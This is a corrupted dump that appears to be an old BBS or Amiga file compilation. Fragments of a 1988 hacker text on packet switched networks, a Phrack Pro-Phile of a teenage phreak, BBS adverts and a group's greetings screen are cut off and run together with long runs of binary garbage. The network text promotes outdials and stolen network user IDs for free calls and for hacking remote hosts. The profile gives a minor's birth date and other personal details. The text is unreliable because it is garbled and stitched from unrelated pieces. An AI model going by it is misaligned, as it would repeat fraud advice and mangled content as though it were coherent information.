_____________________________________________________________ - Thanks To - Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist ~Og spend as much time as you want on it for absolutely no cost. So think about it. Access to any feasible network, including overseas PSNs and packet switches, access to almost any host, access to normal circuit switched telephone-reachable hosts via an outdial, and with an NUI (Network User Identity - Login and password entered at the @ prompt on Telenet), unlimited access to any NUA~g , reversly charged or not. Due to the recent abuse of long distance companies, the use of codes when making free calls is getting to be more and more hazardous. You may ask, 'Is there any resort to making free calls without using codes, and without using a blue box?'. The answer is yes, but only when using data. With an outdial, accessible from your local PSN port, you can make data~H calls with a remote modem, almost always connected directly to a server, or a port selector. This method of communicating is more efficient, safer, and more reliable than using any code. Besides, with the implentation of equal access, and the elimination of 950 ports, what choice will you have? Some Important Networks - As aformentioned, PSNs are not only used iq*.32*|Qg -?'#@J뀂{.\ 68'=.m`@.ÀJLTYaoĀKc.omC>8B1[1ccfaam|  ߈ 2P&`1@0l#< ` 0h+,ωh( 0,H8xٙf(?T e`;X +)TC+M #, 6nf@z_nn`(?a`ppq60rT`kJt'HπfeLn l":EKۀL@.l.:9v, ˁAT8`171<LACK!8lw@OEkNclkn!0q+^xϐjraaI ?gS\Ƹw`[CfP1(hߐ ~= T9MYA@yeX  %> `rhӀ/@Hx00&H. J]pS5(yAaXHPW)`%CÁZ )H M3aRU"8w݁# @_0Kct)Pp+a)] ՝P CR|7`S`]UÅ  ))2BÞ  MR61l80K0S}8q-xt B30Ha$<0)/0 %RQ>!q,sv  [G( Ა?@t @ p ״p +ve!k) S % aj/d 4 0016 < 0"%aazTdC,%8px@ G!<8L??P # *228 ' Xm~ B9 Xm* ^`/G.0< (^06`)TwG>,ǀN qS[cN]00 ?@h;AH(0Р(!tt i@xx@y Gh(P88 wEKP80@(P8 ?*0?JZ NDP)|q-mRҡ@(P|7_~Q?~k*vW~5H? RX ;09: CUDx1`JF@?0]Aw @p*$~ LRÇ*gCCpaD)~0_z~|6<F>!l~{` )BT `?~)@RQ@W_p#e!u1@CX)l28 Gp6 Xp=|@ *_ǀ W?Xqρad@` xp~D 9S HT@r~>P1!(0(Pb 0 Xq.\rO @B@pmPU`<0d``aF /``a#|a)}CS % aj/d 4 0016 < 0"%aazTdC,%8px@ G!<8L??P # *228 ' Xm~ B9 Xm* ^`/G.0< (^06`)TwG>,ǀN qS[cN]00 ?@h;AH(0Р(!tt i@xx@y Gh(P88 wEKP80@(P8 ?*0?JZ NDP)|~zn the United States. They are all over the place. In Europe, Asia, Canada, Africa, etc. This is a small summary of some of the more popular PSNs around the world. Country Network Name *DNIC ~~~~~~~ ~~~~~~~ ~~~~ ~~~~ Germany Datex-P 2624 Canada Datapac 3020 Italy Datex-P 0222 ~WF South Africa Saponet 0655 Japan Venus-P 4408 England Janet/PSS 2342 USA Tymnet 3106 USA Telenet 3110 USA Autonet 3126 USA RCA 3113 Australia Austpac 0505 Ireland Irepac 2724 ~:]" Luxembourg Luxpac 2704 Singapore Telepac 5252 France Transpac 2080 Switzerland Telepac 2284 Sweden Telepac 2405 Israel Isranet 4251 ~~~~~~~~~ ~~~~~~~ ~~~~ * - DNIC (Data Network Identification Code) Precede DNIC and logical address with a ~&3 |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] [ Source: The archives of Magical Hassan - Usr #276 Devil's Playground BBS ] _ _ _ _ _____________________________________________ _ _ _ _ _-_-_-_- -_-_-_-_ _-_-_-_- An Introduction~5 To -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- Packet Switched Networks -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- -_-_-_-_ _-_-_-_- Written By - Revised - -_-_-_-_ _-_-_-_- ~]E -_-_-_-_ _-_-_-_- Epsilon 05/3/88 -_-_-_-_ _-_-_-_-_____________________________________________-_-_-_-_ Preface - In the past few years, Packet Switched Networks have become a prominent feature in the world of telecommunications. These networks have provided ways of communicating with virtually error-free data, over ~_Tvery large distances. These networks have become an imperative to many a corporation in the business world. In this file we will review some of the basic aspects of Packet Switched Networks. Advantages - The Packet Switched Network has many advantages to the common user, and even more to the hacker, which will be reviewed in the next topic. ~O The basis of a Packet Switched Network is the Packet Switch. This network enables the service user to connect to any number of hosts via a local POTS dialup/port. The various hosts pay to be connected to this type of network, and that's why there is often a surcharge for connection to larger public services like Compuserve or The Source. A Packet Switched Network provides efficient data~^ transfer and lower rates than normal circuit switched calls, which can be a great convenience if you are planning to do a lot of transferring of files between you and the host. Not only is the communication efficient, it is virtually error free. Whereas in normal circuit switched calls, there could be a drastic increase in errors, thus creating a bad transfer of data. Wh~  jen using a Packet Switched Network, it is not important that you communicate at the same baud rate as your host. A special device regulates the speed so that the individual packets are sped up or slowed down, according to your equipment. Such a device is called a PAD (Packet Assem- bler Disassembler). A PSN also provides access to a variety of information and news retrieval service~  s. The user pays nothing for these calls, because the connections are collect. Although the user may have to subscribe to the service to take advantage of it's services, the connection is usually free, except for a surcharge on some of the larger subscription services. Advantages To Hackers - Packet Switched Networks, to me, are the best thing to come along since the p~  ۛhone system. I'm sure many other hackers feel the same way. One of the reasons for this opinion is that when hacking a system, you need not dial out of your LATA, using codes or otherwise. Now, the hacker no longer has to figure out what parameters he has to set his equipment to, to communicate with a target computer effectivly. All PSSs use the same protocol, set by international standards. This~  u֪ protocol is called X.25. This protocol is used on every network-to-network call in the world. When operating on a packet switch, you are not only limited to your own network (as if that wasn't enough already). You can access other PSSs or private data networks through gateways which are implemented in your PSN. There are gateways to virtually every network, from virtually every ~ I other network, except for extremely sensitive or private networks, in which case would probably be completely isolated from remote access. Another advantage with PSNs is that almost everyone has a local port, which means if you have an outdial (next paragraph), you can access regular circuit switched hosts via your local Packet Switched Network port. Since the ports are local, you can | 8s no respect for anyone who does this today. Where have all the good times gone? ------------------------------------------------------------------------------ I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in the near future.... And now for the regularly taken poll from all interviewees. Of the general population of phreaks you have met, would you consider most phreaks, if any, to be computer geeks? "No, not really." Thanks Mike. | Tl Crimson Death Sysop of The Forgotten Realm ============================================================================== --- Ax Murderer is out and out against the idea of the destruction of data. He hated the incident with MIT where the hackers were just hacking it to destroy files on the system. He says that it ruins it for the everyone else and gives 'True Hackers' a bad name. He hates it when people hack to destroy, Ax ha~] ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| |P ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| |) |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] ==Phrack Inc.== Volume Two, Issue 18, Phile #2 of 7 ==Phrack Pro-Phile XI== Written and Created by Crimson Death Welcome to Phrack Pro-Phile XI. Phrack Pro-Phil|e is created to bring info to you, the users, about old or highly important/controversial people. This month, I bring to you a name familiar to most in the BBS world... Ax Murderer =========== Ax Murderer is popular to many of stronger names in the P/H community. ------------------------------------------------------------------------------ Personal ======== Handle: Ax Murderer Call him: Mike |2n Past handles: None Handle origin: Thought of it while on Compuserve. Date of Birth: 10/04/72 Age at current date: 15 Height: 6' 2'' Weight: 205 Lbs. Eye color: Brown Hair Color: Brown Computers: IBM PC, Apple II+, Apple IIe Sysop/Co-Sysop of: The Outlet Private, Red-Sector-A, The Autobahn ------------------------------------------------------------------------------ Ax Murderer started phreaking and hacki|rng in 1983 through the help of some of his friends. Members of the Hack/Phreak world which he has met include Control C, Bad Subscript, The Timelord. Some of the memorable phreak/hack BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn, Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland. His phreaking and hacking knowledge came about with a group of people in which some included Forest Ranger and The Timelord. Ax Murderer is a lit|D tle more interested in Phreaking than hacking. He does like to program however, he can program in 'C', Basic, Pascal, and Machine Language. The only group in which Ax Murderer has been in is Phoneline Phantoms. ------------------------------------------------------------------------------ Interests: Telecommunications (Modeming, phreaking, hacking, programming), football, track, cars, and music. Ax Murderer's Favorite Thing ---------------------------- |R His car... (A Buick Grand National) His gilrfriend... (Sue) Rock Music Most Memorable Experiences -------------------------- Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial) Some People to Mention ---------------------- Forest Ranger (For intorducing me to everyone and getting me on Dragon Fire) Taran King (For giving me a chance on MSP and the P/H world) Mind Bender (For having ANY utilities I ever needed) The Necromancer (Getting me my Apple'cat) |  Aߚ17'xⱩ`{8p< xU\ixk8CMA.-NkKfd`M <|CևՒ7wÀ#;1A㶓 gq aJH|GF H&@A@>j_cxf`,P6f *!X @*/d:O5<BR0uGP3U\5 #oCA` 5Hj0 B  2~N@-LP`&@A@>j_cxf`,P6f *!X @*/d:O5<BR0uGP3U\5 #oCA` 5Hj0 B  2~N@-LP`{KI%8BLB!O1nBr74M,JIml%Ny$4$ aV)ybRMjTǮ?myJV;T š % q9'G(v %a* 먅jN,Tf(SU$w;zJRX@d Aߤ#t`LcD:Bhxz FBd2Lj52+(-\.0PC9HlHF`2' >SF8d $$kmHC!/889Ea@==( (}-/݈0'yZy{30%(PLJ;Na "~cf=%r( z#2$\ &DҤuA~p _T6 PF ' 4hQP`00rs$1 /@)5[_"Ξ Ƌ!*d,ge0^  B0fRA"0HDgȯ5=`݃ hT(AQiUU  {+y#!&́ TɄ AqR ( Z~?8 p@@7p\bR`r& hfUR%f @h Pq A s0T[snc  U3!M 0zFNi8iabc%HQc u '!@[Y23 P521%1nIY!pp 16p`ao̐mjʵ Av}@B! .UO@?a%CF/EѴ @v0O{/Pz #9B=d%݇$)`D @,c ؀{@hjFNC*8'{ ` Nz`")-c HhGP)PJA#{&L"'B;r$ S*HU |m h' X>KǕ fġ?!p@E<wL͚KG2*TØK7BamsQ S>$a$P1A1 t 7:goa\ IQH\`@bft3 E9PgB8$,"*& dlbjfk\$ ( H'$0 EHh@DVF@Q MHgb@%WA 2D }$; PH h}wl{  E;v2" 7 f`aAݽL.M"AG y>`Jl3afψsO*#j(>G(+`x؊GTvQMRM휉<E#(+LO#2{NnR\I05!P% OL,VHf]Ϊ+@RJv@͌$IzH -!zO 4=1`L@B P~KUfȥk fC ZZްf & Kf65A'8B)=0HD`B4@[X`'1"11BKb0e4-$d  O) R-Ch@N= .e<bQlIXRגR iKհ9E8д k0gZ Ac8f,|pyp`eM%h -BBP:.0j4>Y3m񶏜F' "P !`_6"x!CH`OH+H&$)|x̫U8$Iټ&?A&@v3K9jM~k"(Q?%: dS)Y´WuG UbB#x*:f7t..`WMr)f&+iS&!9Izv0C6 Q  1ߐk@%6 J |!@p@ HA 75I2@"!:A !x$E)U?p8̀]nt]c2[r^C'x~K`E͕|0!1J 0YvNH8gNX@"P''ȤHzĚ4&dIU!(B +Hl1"Q>JɎI*0:.@0ka .h*p Dp!Z pK2S/䆷H<"P0m D1' 2 f@2j `ч1hg =x 3AN n',> c<1-9f$A E 2 .lp@$$(s$)rfOѺ`$zAxLphMjLH@2o ~+DŽ)bD5g xn=4d(7S)|Q ^:— X2C~ 藼ޓ)|:g-0N?Srs\: &0}\>?'s9ch1 |\ci?x81o`N,~{S%޽fc F?@7A@ D3a0@?F`<d@\3{Nf@G Ll R & Pz/ɰ0y@h:W   Κ?x? S0>@` э*NzwN@c11礧 A x?TSA`KTq$/MAQ0>0 n7 K:\@sHP %D  pw-!mvy<>$&x<8H[(u."|p |L@Q `(/``#(AV` q II=N@Q U#0(Jz$`^`H-t ;`7VZ`5k(7 /7VA믂f6 ES U| 1 p(v+3_PY@@2Ƞ. Eiρ@`֟.\`MeFl -4@%U 6vM@(p$Wہd:Lp#\(,MeVn D׸HĀJ Hpp`Jt kx< p.q%0?.\ 0ld4 p(+A0%>DF"!{.\x 'w \ ( Gn z0`8xx '3& X.OrA<#x'Ex%G30Px, \Q0 O`]Xa<]O`><`]x' @`Q?A< 4' \G O? 'x? '~B{Yx`Qg|X('hRw+> L?,;6'3QOPOPdz B߁K@?,p1T  ?z` lk'~(``w@%Y@ fq&1QbP`Ok{f=$YPdȶjAk |8~[ %z:.`?.A&a<X@? T`_c.\  @?zk /=vӠ@̀ p ^BmAL =,. x0[I\ )퀾6Rxp(?KO'hAhnUe pĆX\'h B!7;@J/`0 ` p/ -ĺ` @;a_6 e ( p m@msmpnz@@` -~SkgYL T pA"\:@.`|J {V CT=dp;inPВAq'2z^BLP0(mڊ=@@_@-(@70OA-T- F DtE8~@- tК s*$iT@KyM F>O瀂X U?3 <:Ŭ~h4Q.|Y\~>`c¤p PBX->2kWn3 * p>(+? @,Y'`TP\f0:~G} :*P?{(YzHk>N%'p36' I=Y=@JNr B=a”b{zq(33֢0) `j 1K.п`% ^ b{8`=0#[,O`%jL(#XV0 s>\ op@yn80Mu.\?X0`>KxXl p`0 ', x`4;¤׀U 80'@%'DxxL p$j0RH:x<H0$jГ+Ml,O`A<`@Yev! L]*Зx(0p .:`E :at(00/ф@CeH(0 LpN$SŊb(Ig^l? B U` %!Psq)磴7 @h0A*+@iE='[,_S0 i6Ԍ8 daf\uP 9Q  ( jpk#5 ś.b8&,>J.d8 p&`)TXpZqP2T~yTH%pTnȸ?x0#옘%sT0>-𖦐JcнWr0jNn<K4>)l  hǁ >А!(H>kC;sod_-9G;×',`\\=RJNW&Fp В?p(_(n.U E0"`@36 U|$ԝ@K{~O5qˌ\C#84!"A5upxHP$#q*_Wn"@D 9ɃH 'CwSyiAMaA9aQ%I5QeA%Q91KS'SGWSgz.?X's 8)x'4%)'c[&$q@g9 \&X!r@K11e$KP Ԙ?AHk9bo$Ex.e@;>?cLbK ;g`)ëkdҿn ~şDU\b/KhdG L\|AD0Ryȿ ?~? ׄP"#2D:wLj {O@xdV8^Q ?g{ `Hot |j )5c!|bԆa{K Aް p(6|z :EQH0iӄ!"@kǀ@`@lVzčQ  /5B1}8Jh6GtPY_7 ˸.Zpӆ d$DlB QnOw!h)@@a ƥB@~c+)ZPX]43"A~̂BS'%@ %GIY Q @*]@TI\s*Kp11A)(sX#=90 &d;qWjp,!Mv& ߼P D .6O^f`Nenaz 0$lvB]D?iW@c"sL 58C `%:1GK)K*9M"*d: &a+7 0-45_% >~64 l#B9DtH+ə@(@1y%)~̠ak$de?L:#ddø0ajU>\f?8@k^@<ƒMa\$HХ28mn2E: PJee_yxٯW\$̠V#%9>=(/(:Յ%A$1tM5!\UKD_ ~#@O*w<Tv ҆A`=eP' 82Rcߙp5Ҿ( nk[| cBAsQ Pf5? X/ DBH"*<@@{.0o`P&AP/TBRV0DqK 1~O@% HV HM(AG:8*h)ڟ6 VL|T!qB_N c=:]r6r$l٨?0"f$<E-ޖG$$Gddlh!*{A'OgPHnRe^iVjR 7~Y{Sȇ Vaw]ܧj9Ae7A``@xp|$koN rX:Z% kI$ :qAz @(`@$G@p#T@%k^h(iD܀A-S" wj9N oZ X{oԣI`sB)i2GaLOMӫl ,-̤ L 8JWЃ,|[xh- _g ۥ HAD32c7q#=hƶ7 xa1&KF{ɜi 4*|$ALp%3w0%5t# ~>9.!mugIh 2=p |G"`䷱.C=ЍK]LXPQ݇b` ΄ Ax8|+# pBz`k`(} l8=w'ϰv,>V?#mv 5<2.sR4w  '?Ls&2Nq:SREo *YPQY@)v^\ 0@Mfぉ a@[\<pݦ J-{0 a>0>0%wЀ@N g(>0\~/\0`C$p.Z`g p+`S |wY+D. 0Ee ^I .p`Kxqp=Sa&ĠK<($$ MeΘ@ߞl P 0-!`Vsa=qnF@AI.^`HDq<un?[z l &  :+@L 3 ia. ;zp$`P``P` L  ` ) @0~```A>\ @@Ȟ@+p50^2' R$iyu`:P@ p ~` `0PU@  X \ =5`:P'(  ?@k?@7f\ U -@@_\0~Xh>p**=@Av hR#fXA+`z T&x; AK@ pAQ2$Ai pw C}- .[` q=䡟h}e yJ , 0(I@{p2.c$Ux`|~ h Bw0+`=0o@WG>zeRaQPRc  E'X)` (# w@@͝ ǀp!8 %X@?\<`CD_@DKK} 4@@?@|q$N`]?uF?-'p2(jj=X8i;@@&"N EX*A Rw^"  bzBd< @>67g ~U׳?e5'p,O` %E?[p? ,O`J~P`6fzL'#{?=0`@q>/R=́&T' "@~]`;A ty'AI8@)'@0 `,@w Pp0a4[\\X| p%*]k`p7aP%ti[ .=<·ima=sj pO`_BL0-#o @|Ks+%'pe` oفr.wl)Pl뀦' sn \=@L3pY `)`@o.m\]p_`9  fZ a\;0O` -`  xY`y0끀p L n `L3kB@on8k_x p0Pg g`8Aq?HMxwx'0=y@{ t`? j $777m`B6XB3G^ <eN ٍL 0J<.ez$'w˶.}c( ( _HA-ہN)uA `V. q q{f1N] Ib';  x!(p@w'a%:piN$kb@%f=?.?`UPD;0DXc1'L'&#` ' $>x|Wdl20-ރ=8vpPOt>0 [x`1pq@>-h|(P'9(vYA=]:N!܀@P z^@Ly!|1p, (I@@ lq8b{"< r\F b{ [~N'?ѐH8=a'D ix '3  06x07C4+G N`0@[P``M]\H`\_Q-AJN.P~`DITG,Ks q AS>&@%+v% IMA/ʧ`L#B>`P%f<Pvl5~|Rgxb0 ,6u@ 4 p*`0%g\ 80. ``J0%g\`F`ʵ :0!a.:H JqA@#!`tx݃Ё@%><8 p .h0!=.P`@*| ` @l`IM`@Gyȫ.T[X"> 0sp-~` H O*56LB x C< w)!pk&Ԁ\968'9WvKB A=@V%q!B[E!`HpO`N+C @b{,O`P%'p `*2\W`@ ;' @ P3U,O`0 `D\ @с` . 0 \ SL\ ,Zl$ @5s`0J\N@  Pl6` 7p(.\Aۀ p.\ `*'ާ*=Pl%&\ p%- 0 @\"p?`7r@K@, 4{WҮ\&`hI@.+@LB,AÞ B$+-0 ` rG@ %Tip@% T0P &\,pq"C0P 6p` E@+(7(0 NIh? .X`;m+_5`Z`*>0 ` тp{`@}( p L@@BJ->>>`@%;GPm(2?`}@LG h @v Xг|8p(.  1P:n C p` 6@`; `n@7@Wb&@  < 0O`P9wfL0H Pلos 5=Wpo`@% 0FP a0%| @L 3X p&ŀb`^Ie:}N 8 l;~p~ 9f`:q#.ŊL!0}`rzKrpO> Ʈ\ 0[ip'0 \ 43ka@h`O¶Z3P W9F\4G`opO`XBKv'5;@L 3'LYl(>@. TXF@ yp>@KXopP RU<phdgtQ9I  BJN0FPUBJN34V0Z5~6 pbPU? u0D`0 ˀoQP 4:pnQ`E0}7 j1 @ @<+TKHUN" }гMHTN*'.Z P\05`6QвpE`6qExPmˁ@gj`Bb@!/`-}8@: @[@ p(` A! ? B\ 0p@=A 6?| B. Џ`?Pt'@x@784@gTxp o(0 G(p(@&P`@p@(2J7.Q =Lc HL Q<6lD p J< xH0 *`KUO D@ @ p S\@ .R+Gx@@w {kB{ 8'p;x4'#B`ОEO`T=36qF-|`` @tz0(O`Wn>A0>!`4CB{>\ 0s`@K;eV)p0"[o;h?~ ĀK60!C(0" %àK{P`O6`Ci {xҸ..0h*x\ .Jx`NH<?i $a=P6 `5A9c P0` 20h;`J P `G|v`E Fx x 1@ @8 0.z`LaJ b  B?(hO 005j/ a=FX!g` --q@|(߰t$' U\l K}6`^5``?qG 0@!x[W5! (U`9-9ʜ ,`G]00O`فx'/wbpd[{. }0 p(pa{ ('`F\x؁qw hN?0ěI T p"9n©7 < Lj6 xxXL # '< ށa< ָ-Q6 ?ࠞ~0@ s^`'Z=8AxG'U@. T;p ;0 n QB` s= !8 %D>aTO瓘O}?EPA}  u?@QO`{  Q_K@@`2q ~P`?4qH*LA`0 }A0V|8 B oLs DgBф1>9P7` Y%;# B0` %  3Pgtt @Z烟7z@?‡k,z.= p?O<pR(;aA \%?0 X,O`0%>P"dfXbqǠ`,'C84,Y`  g]P0ʉh cU `0^/#M"2"V,R \ p .9u! 'P0(w#.Rp@_`JgKg0LpqId [}xs m ̘p`.`@.+L Ѱ,\ p(""&g/@@Jv\ p+`H;8Pp( .e2 6pO`p`4P%@{@V PP~@= i FP97?Rb]@` %  .PA>zt(h0 (|C^!60Xn(36 ;q@3 BL Gw`$,a=Q'^ ^QGؾǀPqГ((.P/P6,@ ~6\qJ PݩQmPe0(oN 3 8@'vD @ IA38p`նPPe'f@.<xh >e(A*EZs(O|A=@@Dv\ Bp@x BU>e x qt+@/> C=>Alp DwYA p0?2 X|0(@4 h6 X|\ F` -`\ p( 6p("fx lW@(Cp?.\ ` ?< p(fq@]P@ "%\ :p@F<` Sp/qKLLNJ`:|Ÿ0 p Ps j]w((P]+@p`.lޠAwPP%@4xp(KFP<`@@2!W XWpY]\&< 401`%`0U* x p)0UAV}+KU`<<ip)Nlip* 'TC0<0U>B ƘC0,XA<`0~ T;M.X;x M,%&R4Ip4.Z``0+=SNn1 Ap-ہ'v2M Rlxӻ p*U;Sg  ?x@< ?a<, ;cA\?a<'FO9@ d@<qL+ wp(3,}O : & Ix yCx>`5 QϱtC3)pӐ_,AB@:?`X%  z f2F7CA`#~; V Q@@L/ F?1!j5 ?'(p4A)Y acB+ w@?@ DP)ŀV~@  R b{ 0 eg T5AC;0퀏O AT` [Pa %s4 3 #p<0qMB O*<*0`^s`}< l7`@x`TM @xp .BU@ 1+w. p*c` KU*\5{p(+`@,,$̸wNja0%L`KgT q߰,WA:x@=)VEK\EG{rfƘT @y1 ' %\ p rw(<0oGY.ZL0} @F , zl ?|A=fgP  _P`Qa* # 5`1}B/w}~Q1  - 7Pu0 > (=-v`)^ lqNJ98}ARIG '% p0RBJ1H3PO#ZcsAa H$@a@>0D` r`~h0bw2"JY%+RPa )1Iʀkga5#"SP },<} `!#(P/UE?G9r'J PJH I q$FHCA$a'fj&AMheHV6lن*([0TqQo(p BgrLxp)'0 Ҝ  ,1Q >APYh0` )3xB%Ҏ@".@c0>CP` &r`PE0k:0 ("P`yp`0vdױ`dOiD !0  `@0Z0.CAH00X*|3a! gSaB ] >\." p78 U9AZ3-o1| A ~P&M@ b01lJ ,qU  Τ0N  "n0* #8]@ @KH p1*fu\`#- M;>i&A~KD@MB8  WBHty00A S|p "f8`` 87><-j 7 B@_@ P }2 `PP!pƞm \ `mↀ}@ x D̀ ^RqSvc"V|0P0$oX  ,NDH>p +QHA@\FX2Q@/T 3 09ח4G YĦ4f *ZΫ{`pHQR 0"($)H?B#BYX~IH-d0HP9 AB)` A Bi<]9@3X x[Ma 0.40 bVZWX,\p(R z` C xL @5F0` +fZa5N Pc` +Za5{3 Iր@ p.P5F@X ! Gz@ څ`:4p 4  L=$X,0 gqTQnxA{[t|HHHyk@BF 0 ( )"XVy2( 6`MLX@Qbk.P `r`@9 )*  0ȫjp"@@@倀Υ dos.librari>` XX`@\2D rq0@P`p!рt"3$(-hrP(#R(EJ.Q/Nh .Ka q@N 0:Ft qU*(:LD $ F   & V f j p v  8DZbjt%HRjt ( 6 n | 6 @ 0 p z "Llp)$.6>"*0>q V?FJ`  :R,R     @4 C4]G4+K4އ|T|<|<|<|`@ `@  nyz{|}~{/k[—KÇyǃCփCCU  ׀asAwHPvHGG-0b) .\a)*b1k!61@}СR8h @R@KoGSpq Wi*  pۀ> 48-+Lh?W~_@cA$ A͆ B1T(Å!B8>0^vaJ! 8)A>W201UA~J B J&)X0'6Т80]`Bcap%S f#L>8Ӈ>1B8 p*~ D6BE $,P6 Rh.Å !`PHW~ AL.&LU` `P),:q/$S.4(8x`l?q봕*@* Jç ?L b,À. (Q*8tq}ߡ0Ia3BX@!l61haq X! &a0A~ L$`:`YeMcN >, Hb!mAw ^AqF_ xLp @QN&  rMH0haC̓5GL"K@Wvox Kp #0 >YÂMd 9aQ|PD'0=a`bd>&$CpC3!xtډ54IP D,\pa1bѨcB \QlLXD90X`0nӏF4kp`ë LzHtLÃZxlp ϋG{6 #XP+8 b^,@ [LXn`RXp߁R`P!0]`qH ᰰJ^  @#);.?`q YgI 2 L40l`@p~ Lb CxbUWX0`!!B0+.ŁX(:*ذpw`A OfF !hrpb`MYgB  1Hy8F@r݂."0O?#T^X -czjمSX0pwa@„H  =X6@MEF; ?,1 H4d@0ɰ,2'`f``Rl4" ffI״BLR vv8-l6@c`Ra) :N Eφ  É fx BcN D ?N?6 S>0X:`a)84PSq D|>|3Ϗ>?4, jˈ@Rl dƊJ?8 pHG"~|x7xlbp8D₾R /R\-`Q¥H[n\S  =A ; .(0G@ % Ё`0P@0<~@G/P0]9P@08W, X!(;|4(.`@}p?`P\az > Bx@l U ~  p(,PA<@?/ /ZBaklk @( p(p([ 4> /p@&= 78 ߨE@08$N ;' Je{# 1HUW0R<$1eyT?2Pea]C<4AtD2 >2Y10ippDKQNu" 3C&  jaScXN,eF'^`Wh %Pھi-~ogeʛrp~oW޼4Հ K:._XY‰L y3:`n$AfI6\ј{FC>O^0oP{i؀'!;2=9fÐ'=H]y|!}p/(DSMQ80F@@k:%Tb66j?s' $8~B^́R ̾F1_fWNUK̂F ̰8y\t&{H}D`0F#Qˌ =Grv1Mњs|٨|ـ9pd>uYs 8 xU>.=i4 , \VHý)4Ic#$0G@KcB(aj4~̬@j7ր7|?60A j&DAn>s2Aȉ$]m_6J6~1P]L+ip7><n 5$Ѓ9 qIT$B0vaPj|PlCtl`!Fz00'$|h8[D 8 4_A!_0Z`c|1 /@= [.A,3Ғ F@0T|xyDxQf@u]) >( l0 jQƨ$] 8O6 4j*K UcR5͜e:|Of/CI|PJ=]B=8ׄ* Bk"D4i2$JB0Bf8, R=!-! 89! #2"̓E ?Y@H89\C B q8\3ys!8 cCd.HoW"L ;@j'v$AC$u*ldlaign`FicjgGG^A *Rm[PRPY4 A( @ @lظrL \@jN0~3d?aXȰ$[)(m`'-屡q a7Ih"ļ1pk8;b +Gb G+#eC9x!*|)R/B^ƊM }!u,Lr35T6pɃlr9P5L9T G.f*pT l/@P'A$B%?䊲&@I)2, #< '-;aԆgN?E=z;M %Q ߏ7Fp8úaվa` 0)p.`;a1BP @o˃P*J ipC!|u!= x]Τ` `n*F B- \z /8虇8Mˏ_ sMF }?$\9Hb^]/4}8$p=R PLA(3I`@ B xGfNZ#i cc!#I_[ %$0  c?Ǧ@ G@i4d߸pML D#An(e1z*)hy $⯰4Of?T<|xaBR3 43C3G0(m>c 3yr[i y\jY[p>`~Bp>ll&lbA>MIbU9R "0JlEn" *x}>B0 k7SKNqp@,7G;E-СADހQdbz"/= X 06m/)G_^pPEԧ ?퇿  fjIodgVE$b$h3 7(^bu0oPOp@6#}'-cL;tbH`\\/=Y@s>|c @) `f ̀A:"T`O`O(` m)\@ iM%_w`O$9~@0<j#DA-4!Jb¶" s 4Q<#瑘bheEH>ÅȋG(33ȧ P"Q|SHH~g`0P1=") C ee:ˌ %a D}tUE# m8?1,M`k_̼o"ۧf+>/0!?4@(l2lÿfA<)Z@J,\cP3c@ts=0&P  r~`3gr ` H a>xB,1 ]J̜kCKC@!B`Q06onMDE480@xKnbP"/@ 8V7t;ڨ~(&UD-U^DB\lhp\ LgC22`De rwe$kN(pD|Zź-eph䎔N ~!H)`-"@pl #@92\ւFzL?ΥLR=A ΀NȞfAX˰<V†)jY5I tG&Gkd TN=<EB aW 1Eƌ*[`򐹀 ,])H`<'JQ$V5!a882痨IHJI' QI`!B(AlID\\ ? 2gh44eH "U&b" dFd> "|$1 XlUroCVv ` a)  ^gȴ>xq L%91 ニ4}TF7ajF8Ɗ@<,"`&РKTT%< _HQZ]MQF]"s)x"0 Ί >C /@gHhѽ0PJ8d⬍P %(P_- v|y ZS#^؀:%:TJmAoB}?Fn jꌐZ ma*' @ s fČ IL  ) )"  NH & Ao$ ~~@F0u"2hFdMaMD[% scƶFOR MORE ACU COMPILATIONS VERY SOON...DO YA LIKE THE NEW MENU??? IT WAS CODED BY THE ACU/OMEGA V/ACU. NOW SOME GREETZ TO (IN NO ORDER) : ALL ACU MEMBERS AROUND THE WORLD, DECAY, VIOLENT, SONS OF MERCY, TAL/BETA5, DIGITAL WARRIORS, BRAINSTORM, WIZZCAT, TGS/THE ANGELS, MUNSTER/SPREADPOINT, VISION FACTORY, SKID ROW, QUARTEX, EXODUS, SUCCESS, TROON, TETRAGON, THE NOVA, THE FORCE, SCOOPEX, PHAZE 101, THE HACKER, ACME, DICTATORS, CAD CAM, FINE, DREAM VISION, VISION, KEFRENS, PARADOX, RSI,s D-MOB, AFL, EXCEL UK, IPEC ELITE, ALTAR, PASSION, CELESTE, SCORPIONS AND TO ALL OF THE ELITE DUDES I FORGOT......SIGNED ACU. cgikmoqsuwy{} HACKERS AND HACKING PART # 1 oG{qOեZN."MNb z,(PXLoNXBLoNuH~":$:n&<NL~ z\NuEpfae6faeran6rahQnNuraXTBDB  nNuraB|n2grBvBa0CRBDB QnNura6TCr aVBDB`ra6PC`tfaRQNu fa:DNu$H(H@PS`@ՠH@T @Uh44p C?" 8q*!<02 τX@( ,SFp`@800A@$ # l !`,B8uw!!&c$A Gf1"Lk)<(B8lyD8;0 B&$ARf(*V -^$h-qah &>+"G9 BHCHM /LΪOePP;y`Fp IH| ([1_ zptU _Ӄf~ 30-p9s0J`a(~dMoU {4!2rjE((1Tm[ ,px!BΆgxXc >l2 Q|V @)BHƼ @BR`40"4@ HZTL%@(3(20 jP( ((0$| PK`b@Ϡp9ݺ -L12hG0\N.Yx^\8Ur@=SuAA2Ն,&~D-K3; @h;9?#I T((j:@)ZAY4ȿR)@CKOD0 bG NEB#SXaG#d K8'z 